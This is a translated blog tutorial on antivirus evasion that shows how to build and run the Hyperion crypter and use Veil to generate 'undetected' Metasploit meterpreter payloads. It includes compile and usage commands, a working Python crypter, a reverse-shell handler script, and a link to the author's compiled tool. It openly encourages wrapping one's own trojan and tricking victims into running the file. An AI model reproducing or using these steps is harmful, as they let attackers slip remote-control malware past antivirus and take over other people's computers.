Kids, don't be afraid of AV ~ The AV here means AntiVirus, i.e. anti-virus software. (Lots of exams lately, so updates are few and far between..)
This article briefly introduces the commonly used AV-evasion tools and how to use them ~
0x00 Hyperion
Let's talk about this one first, because it is relatively lightweight ~ Why lightweight? Because 360 anti-virus can still detect its output..
In fact it is an encryption tool (a PE crypter): it encrypts your payload executable with AES and wraps it in a decryption stub, so the result still runs under Windows. How it works: it outputs an encrypted executable, and that file is the payload you use in the attack. The AES key is not stored in the output. When the output file is executed on the target machine, the stub brute-forces the (deliberately small) key space of the encrypted container, and once the key is found the decrypted payload (e.g. a meterpreter executable) is run automatically.
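The principle described above, as an added example that is not Hyperion's own code: the payload is encrypted with a key that is never written to the output, only a few key bytes are left unknown, and the "stub" brute-forces them at run time, recognising the right key by a checksum of the plaintext. AES is replaced by a SHA-256 keystream so that the script runs with no third-party modules (this stand-in is an assumption of the example, not what Hyperion ships); the reduced key space, the brute force and the checksum test are the point. The sample payload bytes are constructed for the demo.

```python
# Added example (not Hyperion's own code): a Hyperion-style crypter reduced to
# its essentials. Cipher: SHA-256 keystream as a stand-in for AES-128.
import hashlib
import itertools
import os
import struct

KEY_LEN = 16        # AES-128-sized key; only the first UNKNOWN_BYTES are secret
UNKNOWN_BYTES = 2   # 2^16 candidates: seconds of work for the stub, no key on disk
CHECK_LEN = 8       # bytes of SHA-256(plaintext) stored as the "did I find it" check


def keystream(key: bytes, length: int) -> bytes:
    """Stand-in stream cipher: SHA-256(key || counter) blocks (not AES)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + struct.pack("<Q", counter)).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def expand_key(secret: bytes) -> bytes:
    """Hyperion-style key: the secret bytes, the rest of the key fixed at zero."""
    return secret + bytes(KEY_LEN - len(secret))


def encrypt_payload(payload: bytes, unknown_bytes: int = UNKNOWN_BYTES) -> bytes:
    """Build the container: [len][checksum][ciphertext]. The key is thrown away."""
    secret = os.urandom(unknown_bytes)
    ct = xor_bytes(payload, keystream(expand_key(secret), len(payload)))
    check = hashlib.sha256(payload).digest()[:CHECK_LEN]
    return struct.pack("<I", len(payload)) + check + ct


def decrypt_container(container: bytes, unknown_bytes: int = UNKNOWN_BYTES):
    """What the stub does at run time: try every candidate key until the checksum
    of the candidate plaintext matches. Returns (payload, key, attempts)."""
    (length,) = struct.unpack("<I", container[:4])
    check = container[4:4 + CHECK_LEN]
    ct = container[4 + CHECK_LEN:4 + CHECK_LEN + length]
    attempts = 0
    for candidate in itertools.product(range(256), repeat=unknown_bytes):
        attempts += 1
        key = expand_key(bytes(candidate))
        pt = xor_bytes(ct, keystream(key, length))
        if hashlib.sha256(pt).digest()[:CHECK_LEN] == check:
            return pt, key, attempts
    raise ValueError("no candidate key matched: container corrupt or wrong key-space size")


if __name__ == "__main__":
    # Constructed stand-in for a payload (real input would be a PE file).
    sample = b"MZ\x90\x00 constructed sample payload \xcc\xcc" * 3
    box = encrypt_payload(sample)
    print("plaintext visible in container:", sample in box)
    pt, key, tries = decrypt_container(box)
    print("recovered:", pt == sample, "key:", key.hex(), "attempts:", tries)
```

Two things this makes visible: the static file holds neither the key nor the plaintext, so a signature on the payload itself cannot match; but the decrypter stub in front of every container is the same fixed code, and that is exactly what a signature can key on, which is consistent with 360 flagging Hyperion output even for benign input.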
Homepage: http://nullsecurity.net/tools/binary.html
After downloading and unpacking the archive there is a Makefile, which is for building on Linux (under wine with MinGW).
First change into the MinGW bin directory inside your wine prefix:
cd ~/.wine/drive_c/MinGW/bin/
Then compile the crypter sources from the unpacked "Src" directory (the Hyperion-1.0 directory is assumed to be unpacked under this directory; adjust the path otherwise):
wine g++.exe Hyperion-1.0/Src/Crypter/*.cpp -o bypassav.exe
If the command succeeds, bypassav.exe is ready. The next step is to encrypt our payload; the whole process is automated. You only specify the input payload and the output file name, and an evasive payload is generated.
Didn't compile? OK kids, I'll give you mine.
Link: http://pan.baidu.com/s/1zjkD8 password: gayw
Usage is below and is very simple. One thing to note: the compiled exe must be placed in the Hyperion root directory, i.e. directly under the Hyperion-1.0 directory, because it looks for its decrypter stub sources relative to the current directory.
Win: at the command prompt, run bypassav.exe followed by the payload file and the output name, e.g. bypassav.exe payload.exe demo1.exe. For details see:
Lin: the same through wine: wine bypassav.exe payload.exe demo1.exe
On success a demo1.exe binary is created in the current directory; this is the "undetected" payload. Why the quotation marks? Because even if the source file is a perfectly normal program, 360 flags it once it has been encrypted by Hyperion.. For example:
It was reported as a virus the moment it was run. So why introduce it at all? Because it is very effective against foreign AV products, McAfee included ~
Another point to note: pr and other programs that need interaction or command-line parameters cannot be wrapped this way. Why? Think about how it works: the stub just decrypts and runs the payload, it does not pass arguments through to it ~ So what do you do? Swap the payload for your own trojan instead, (* ^__ ^ *) hey......
0x01 Veil
The second artifact! An absolute must-have for payload AV bypass, a real piece of kit for evading and stripping detection ~~
Introduction:
Veil is a payload generator that produces payloads compatible with the Metasploit framework. In most network environments Veil can bypass common anti-virus software; it tries its best to make every payload file random.
Currently Veil supports 7 different methods of producing 21 different payloads, all of which result in Meterpreter connections. Veil gives you the option of converting the Python payload into an executable with either Pyinstaller or Py2Exe.
When using Pyinstaller (the Veil default), Kali Linux converts the file into an executable (exe) directly, without needing a Windows virtual machine or a second machine. When using Py2Exe, Veil generates three files that are needed to create the final executable:
the payload file (Python), a file with the runtime requirements, and a batch script that runs Py2Exe to convert the payload into an executable. To generate the final payload, copy the three output files to a Windows host that has Python, Py2Exe and PyCrypto installed and execute the batch script.
This builds the final executable, which is then uploaded to the target. The executable can be dropped anywhere on any Windows system, because all the required libraries are bundled inside the exe. Once it is dropped and executed on the system, the payload calls back with a meterpreter session without the AV detecting it.
Project: https://github.com/veil-evasion/Veil (the project has since moved to the Veil-Framework organisation on GitHub)
The following is a brief description of how to use it ~
First, installation:
After downloading, go into the Veil directory.
Inside it, enter the setup directory, where there is a setup.sh, and run
sudo ./setup.sh
Root permission is required here ~
It then downloads some files and installs them. A Python installer window appears (Python for wine), just like installing Windows software: keep clicking Next and keep the default settings.
After installation, run Veil.py in the Veil root directory:
python Veil.py
The Veil interface then opens, like so:
Here we can see several modules. What!? You don't know them? Kids, English is easy enough to learn !!
Here we can see all the payloads in the list.
There are 20 of them, and we'll use one; this demonstration uses the python module.
Enter use 13
Payload 13 is selected, and you are taken into its options, like so:
Enter generate
Then we can choose whether to use msfvenom or custom shellcode.
Enter the payload you chose, then the listener IP address (LHOST) and port number (LPORT), for example:
Then press Enter, and Enter again. After a moment you will be asked for a file name; any name will do. Then select pyinstaller, and our payload is generated ~
The paths of the generated files are printed. The rest is getting the generated file to the person you want to control and having him run it; how to do that is up to you...
Of course, we also need to run msf.
There is a handlers directory among the output paths above. No doubt about it, let's go in ~
cd ~/veil-output/handlers/
In this directory there is a resource file to run:
msfconsole -r demo_handler.rc
Then msf starts, and when the other person runs the file you get a shell (meterpreter, as I selected here).
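What the handler resource script contains: the page runs demo_handler.rc but never shows it. The block below is an added example of a typical multi/handler resource script for a reverse meterpreter payload; it is not Veil's generated file (Veil writes one matching the payload you generated), and the LHOST/LPORT values are placeholders chosen for the example and must match what you typed into Veil.

```text
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
set ExitOnSession false
exploit -j -z
```

ExitOnSession false together with exploit -j -z keeps the handler listening as a background job after the first session arrives. For the shell_bind_tcp alternative mentioned further down, the payload becomes windows/shell_bind_tcp and the handler needs RHOST set to the target's address instead of LHOST, since in that case msf is the side that connects.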
Wait, is running it all there is? Didn't I say "undetected" today? Haha, look at the result ~
There is a small defect though: one thing it cannot do is connect out silently.
This is what 360 Security Guard does (it prompts on the outbound connection)..
What to do? We can choose the shell_bind_tcp payload instead, so no alert is raised; the other side is still asked whether to allow the program to access the network ~ The premise, of course, is that the other party is reachable from the Internet, so that you can connect to his computer --.
How you bind it and how you fool people is up to you ~
Below is a video by a foreigner:
Link: http://pan.baidu.com/s/1cO8hE password: v2v9
Mum said don't do anything bad ~
Please credit the source when reposting: http://blog.sina.com.cn/ridterQ